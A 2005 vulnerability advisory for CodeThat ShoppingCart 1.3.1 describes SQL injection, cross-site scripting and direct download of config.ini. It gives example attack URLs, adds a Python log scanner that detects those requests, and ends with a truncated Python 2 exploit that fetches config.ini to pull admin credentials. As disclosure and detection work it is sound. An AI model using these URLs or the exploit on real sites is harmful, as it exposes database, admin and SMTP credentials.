##########################################################
CodeThat ShoppingCart Critical information disclosure
XSS and SQL injection
vendor Url: http://www.codethat.com/shoppingcart/
advisory: http://lostmon.blogspot.com/2005/05/codethat-shoppingcart-critical.html
vendor notify: yes   exploit available: yes
Discovered By Lostmon And icaro exploit code by icaro
############################################################
CodeThat ShoppingCart contains a flaw that may lead to an
unauthorized disclosure of SQL connection data. It is possible
to gain access to plain text SQL configuration details: a user
can create a specially crafted URL to access the 'config.ini'
file, which may lead to a loss of confidentiality.
This flaw also reveals the admin's username and password
hash (automated exploit available) and the credentials used
for the SMTP server configuration.
It also contains a flaw that allows a remote cross site scripting
attack. This flaw exists because the application does not validate
the 'id' variable upon submission to the catalog.php script. This
could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust
relationship between the browser and the server, leading to a loss
of integrity.
All flaws were found by Lostmon (lostmon@gmail.com)
and icaro (icaro0@gmail.com), and the exploit code was written
by icaro from http://www.badchecksum.tk
##########
versions:
##########
1.3.1
###########
Solution
###########
no solution at this time
############
Timeline
############
discovered: 6 may 2005
vendor notify: 7 may 2005
vendor response: 8 may 2005 (automated response from spamarrest)
vendor fix:
disclosure: 9 may 2005
##########
examples:
####################
Cross site scripting
####################
http://[victim]/codethat/catalog.php?action=category_show&id=2">
###############
SQL injections
###############
http://[victim]/shoppingcart/catalog.php?action=category_show&id=1%20or%20like%20%60a%%60
nice SQL error/response ...
umm, then try to list all products:
http://[victim]/shoppingcart/demo/catalog.php?action=category_show&id=1%20or%201=1
command executed successfully !!!!
Apparently a non-critical SQL injection: the database only has
three tables, and no passwords or other information are stored
in the database.
##############################
Critical information disclosure
Exploit code included.
###############################
A remote user can directly access the SQL user name, password,
host, and all details about the SQL configuration.
A remote user can directly access the admin's user name and password hash.
A remote user can obtain information about the SMTP configuration.
http://[victim]/shoppingcart/config.ini
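As an added example (not part of this advisory and not the vendor's code), the following Python 3 script scans Apache combined-format access logs for the request patterns described in the sections above: direct fetches of config.ini and catalog.php requests whose id parameter is not a plain integer. The log lines, client addresses and byte counts are constructed for illustration; the request paths follow the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache combined log format; only client IP, request target and status are used.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) \S+" (?P<status>\d{3})')
SQL_WORDS = re.compile(r'\b(or|and|like|union|select)\b', re.I)
MARKUP = re.compile(r'[<>"\']')

# Constructed sample lines (RFC 5737 test addresses); the request paths follow the advisory.
SAMPLE_LOG = [
    '203.0.113.5 - - [09/May/2005:10:01:02 +0200] "GET /shoppingcart/catalog.php?action=category_show&id=2 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [09/May/2005:10:01:09 +0200] "GET /shoppingcart/catalog.php?action=category_show&id=1%20or%201=1 HTTP/1.1" 200 18230',
    '203.0.113.5 - - [09/May/2005:10:01:15 +0200] "GET /shoppingcart/catalog.php?action=category_show&id=2%22%3E HTTP/1.1" 200 5200',
    '203.0.113.5 - - [09/May/2005:10:01:20 +0200] "GET /shoppingcart/config.ini HTTP/1.1" 200 640',
    '198.51.100.7 - - [09/May/2005:10:02:00 +0200] "GET /shoppingcart/config.ini HTTP/1.1" 403 220',
]

def classify_target(target):
    """Findings for one request target: config.ini fetches and tampered catalog.php id values."""
    parts = urlsplit(target)
    findings = []
    if parts.path.lower().endswith('/config.ini'):
        findings.append('config.ini requested')
    if parts.path.lower().endswith('/catalog.php'):
        # parse_qs percent-decodes, so id=1%20or%201=1 arrives here as '1 or 1=1'
        for value in parse_qs(parts.query, keep_blank_values=True).get('id', []):
            if value.isdigit():
                continue  # a well-formed category id is a plain integer
            if SQL_WORDS.search(value):
                findings.append('sqli: id=%r' % value)
            elif MARKUP.search(value):
                findings.append('xss: id=%r' % value)
            else:
                findings.append('non-numeric id=%r' % value)
    return findings

def scan(lines):
    """Return (ip, status, finding) tuples; a 200 on config.ini means the file was really served."""
    alerts = []
    for m in filter(None, map(LOG_RE.match, lines)):
        for finding in classify_target(m.group('target')):
            if finding == 'config.ini requested' and m.group('status') == '200':
                finding = 'config.ini DISCLOSED (served with 200)'
            alerts.append((m.group('ip'), int(m.group('status')), finding))
    return alerts

if __name__ == '__main__':
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

A 403 on config.ini shows the web server is already denying the file; a 200 is a confirmed disclosure of the SQL, admin and SMTP details and the credentials should be rotated.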
#############################################
Proof of concept automated exploit in Python
#############################################
# Lostmon Dismarking tm && icaro Badchecksum tm
# Extract information tool exploit
# Coded by icaro, Discovered by lostmon && icaro
# Python 2 code (httplib.HTTP is the legacy client API of that era)
import httplib
import sys
import string
import socket
import os

def uso():
    # print the usage banner
    print '\n\n\nLOSTMON DISMARKING && ICARO BADCHECKSUM TEAM\n'
    print 'Usage: python ' + sys.argv[0] + ' host /directory_of_shoping_cart/\n'
    print 'Example: python '+ sys.argv[0] +' www.myhost.com /shoping/\n'

def leeini(direccionweb,directorioshoping):
    # request config.ini from the shopping cart directory and save the body to tmp.txt
    web=httplib.HTTP(direccionweb)
    web.putrequest('GET',directorioshoping+'config.ini')
    web.putheader('Host',direccionweb)
    web.putheader('Accept', 'text/html')
    web.putheader('Accept', 'text/plain')
    web.endheaders()
    errcode, errmsg, headers = web.getreply()
    fichero=web.getfile()
    datos=fichero.read()
    f=open('tmp.txt','w')
    f.write(datos)
    f.close()
    # read the saved file back line by line
    f=open('tmp.txt','r')
    lineas=f.readlines()
    f.close()
    n=0
    print 'EXTRACCION DE PASSWD DE ADMIN SHOPING CART\n'
    # the advisory text ends here; the body of the loop is not present in the source
    while n